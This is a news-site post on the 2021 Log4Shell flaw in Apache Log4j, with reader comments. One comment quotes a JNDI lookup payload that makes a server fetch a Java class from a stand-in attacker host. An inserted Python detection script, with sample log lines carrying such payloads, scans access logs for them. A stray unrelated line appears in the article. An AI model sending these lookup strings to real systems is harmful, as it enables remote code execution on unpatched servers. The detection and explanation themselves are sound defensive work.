
posted by janrinok on Saturday December 11 2021, @02:33PM
from the is-that-what-'write-once,-run-anywhere'-means? dept.

'The Internet is on Fire'

'The Internet Is on Fire':

The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.

Log4j is a Java library, and while the programming language is less popular with consumers these days, it's still in very broad use in enterprise systems and web apps. Researchers told WIRED on Friday that they expect many mainstream services will be affected.

For example, Microsoft-owned Minecraft on Friday posted detailed instructions for how players of the game's Java version should patch their systems. "This exploit affects many services—including Minecraft Java Edition," the post reads. "This vulnerability poses a potential risk of your computer being compromised." Cloudflare CEO Matthew Prince tweeted Friday that the issue was "so bad" that the internet infrastructure company would try to roll out at least some protection even for customers on its free tier of service.

All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.

"It's a design failure of catastrophic proportions," says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.

'The Internet's on Fire': Techs Race to Fix Major Cybersecurity Software Flaw

'The internet's on fire': Techs race to fix major cybersecurity software flaw:

Amit Yoran, CEO of the cybersecurity firm Tenable, called it "the single biggest, most critical vulnerability of the last decade" — and possibly the biggest in the history of modern computing.

The vulnerability, dubbed 'Log4Shell,' was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software. Experts said the extreme ease with which the vulnerability lets an attacker access a web server — no password required — is what makes it so dangerous.

New Zealand's computer emergency response team was among the first to report that the flaw was being "actively exploited in the wild" just hours after it was publicly reported Thursday and a patch released.

The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on November 24 by the Chinese tech giant Alibaba, it said. It took two weeks to develop and release a fix. But patching systems around the world could be a complicated task.

May I have a cup of water?


  • (Score: 5, Insightful) by VLM on Saturday December 11 2021, @05:54PM (1 child)

    by VLM (445) on Saturday December 11 2021, @05:54PM (#1203952)

    It's interesting to look at this from other perspectives than strictly security dudez

    From a developer point of view it looks like the problem is three parts:

    https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup [apache.org]

    That sounds like a nifty feature, you can enhance your logs by doing JNDI lookups over various protocols.

    Also language features like string interpolation sound so cloyingly simple and attractive when writing code.

    Another novel language feature is first-class functions, which mean you can pass classes around and run them, data as code, what could possibly go wrong?

    Mix the three together, separately none of which are a problem if used correctly, and you try to log some bastard's User-Agent: and he tells you it's "${jndi:ldap://pown.me.harder.fu/naughty}" and that file is a java class fetched over ldap that powns your web server.

    I think the standard SN comparison to the classic little bobby tables, is instead of running the directly passed SQL, you hand the victim a string interpolated URL capable of downloading a picture of the little bobby tables cartoon jpeg and the dumb SOB fetches the cartoon pix, then OCRs the pix, then executes the OCR'd code blindly as if it's trustworthy code, LOL.

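The lookup chain VLM describes (user-controlled header text reaching a logger that interpolates `${...}` lookups) is exactly what defenders ended up hunting for in their own web-server access logs after disclosure. The following is an added detection example, not code from the page, the commenters, or the Log4j project: it parses constructed combined-format access-log lines, folds lookups nested inside another lookup down to their literal result the way Log4j would evaluate them before the outer lookup runs, and reports which logged field carried a `${jndi:...}` reference and which host it pointed at. The IP addresses and hostnames are made up.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not from the page): one benign request and two
# requests carrying the kind of lookup string VLM's comment describes, one in the
# User-Agent header and one in the request path. Both fields are routinely logged.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2021:14:33:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Dec/2021:14:33:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"
203.0.113.9 - - [11/Dec/2021:14:33:09 +0000] "GET /?q=${jndi:rmi://attacker.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"
"""

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d+ \S+ "([^"]*)" "([^"]*)"$')
# An inner ${...} that sits inside an enclosing, still-open ${ lookup.
NESTED_RE = re.compile(r'(\$\{[^${}]*)\$\{([^${}]*)\}')
# Outer JNDI lookup: capture the URI scheme and the host it points at.
JNDI_RE = re.compile(r'\$\{jndi:([a-z]+):/*([^/}]*)', re.IGNORECASE)


def canonicalize(text: str) -> str:
    """Fold nested lookups to their literal value, innermost first, as Log4j would.
    Generic rule: an inner ${a:b} becomes the text after its last ':' with a leading
    '-' (the default-value marker) removed. Case is ignored when matching afterwards."""
    prev = None
    while prev != text:
        prev = text
        text = NESTED_RE.sub(lambda m: m.group(1) + m.group(2).rsplit(':', 1)[-1].lstrip('-'), text)
    return text


def scan_line(line: str):
    """Return (src_ip, field, scheme, host) when the request line, referer or user-agent
    carries a JNDI lookup, else None. Only logged fields are inspected: that is where
    the string must land for Log4j to evaluate it."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src = m.group(1)
    fields = {'request': m.group(2), 'referer': m.group(3), 'user_agent': m.group(4)}
    for name, value in fields.items():
        hit = JNDI_RE.search(canonicalize(value))
        if hit:
            return src, name, hit.group(1).lower(), hit.group(2)
    return None


def scan_log(text: str):
    """Return all hits plus a per-source-IP count for triage and blocking."""
    hits = [h for h in (scan_line(l) for l in text.splitlines()) if h]
    return hits, Counter(h[0] for h in hits)


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG)[0]:
        print('src=%s field=%s scheme=%s host=%s' % hit)
```

A hit means the string was logged, not that exploitation succeeded; correlate the timestamp with outbound LDAP/RMI/DNS connections from the web host to decide which is which.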
  • (Score: 4, Touché) by sgleysti on Saturday December 11 2021, @07:50PM

    by sgleysti (56) on Saturday December 11 2021, @07:50PM (#1203973)

    I'm certain this could have been avoided with more layers of abstraction not understood by the developers writing the high-level code.